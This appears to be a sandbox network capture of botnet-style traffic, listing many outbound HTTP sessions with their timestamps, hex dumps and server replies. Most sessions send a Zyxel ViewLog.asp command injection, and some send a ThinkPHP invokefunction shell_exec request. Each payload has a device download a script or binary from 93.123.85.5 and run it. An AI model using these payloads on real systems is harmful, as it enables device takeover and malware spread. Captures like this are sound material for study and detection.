                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              67192.168.2.234095831.136.144.2468080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.058691025 CET2575OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:23.058526039 CET2939OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:29.201797009 CET3695OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:41.232124090 CET5155OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:05.804899931 CET8185OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.950475931 CET14256OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              670192.168.2.234674031.136.215.1958080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.369335890 CET13243OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:48.359366894 CET13370OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:50.347189903 CET13629OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.438504934 CET14151OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.373528957 CET15148OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:18.243495941 CET17165OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:50.239181042 CET20677OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              671192.168.2.233553631.136.207.618080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.369659901 CET13243OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:48.359366894 CET13370OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:50.347189903 CET13629OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.438504934 CET14150OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.373528957 CET15148OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:18.243550062 CET17165OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:50.239181042 CET20677OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              672192.168.2.233957285.244.220.798080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.373131037 CET13244OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              673192.168.2.235803231.200.59.198080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.700098038 CET13312OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              674192.168.2.233921494.122.73.1548080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.706476927 CET13313OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              675192.168.2.235359685.105.132.88080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:47.706842899 CET13314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:48.060847998 CET13362INHTTP/1.1 301 Moved Permanently
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'self'
                                                              X-XSS-Protection: 1; mode=block
                                                              Strict-Transport-Security: max-age=15552000
                                                              location: https://192.168.0.14:8443/cgi-bin/ViewLog.asp
                                                              Date: Mon, 13 Nov 2023 21:19:47 GMT
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=5
                                                              Transfer-Encoding: chunked
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              676192.168.2.234017095.100.75.5880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.158371925 CET13364OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.457859039 CET13373INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:48 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:48 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 62 37 61 37 62 35 63 26 23 34 36 3b 31 36 39 39 39 31 30 33 38 38 26 23 34 36 3b 31 38 62 31 32 63 64 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ab7a7b5c&#46;1699910388&#46;18b12cdc</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              677192.168.2.234001095.217.162.17880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.166325092 CET13365OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.478250980 CET13374INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.22.1
                                                              Date: Mon, 13 Nov 2023 21:19:48 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 157
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              678192.168.2.233460695.57.203.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.232516050 CET13367OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:48.607458115 CET13377INHTTP/1.1 200 OK
                                                              Nov 13, 2023 22:19:48.607569933 CET13377INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                              Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              679192.168.2.234674431.136.227.2308080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:48.370338917 CET13371OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:49.383189917 CET13504OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
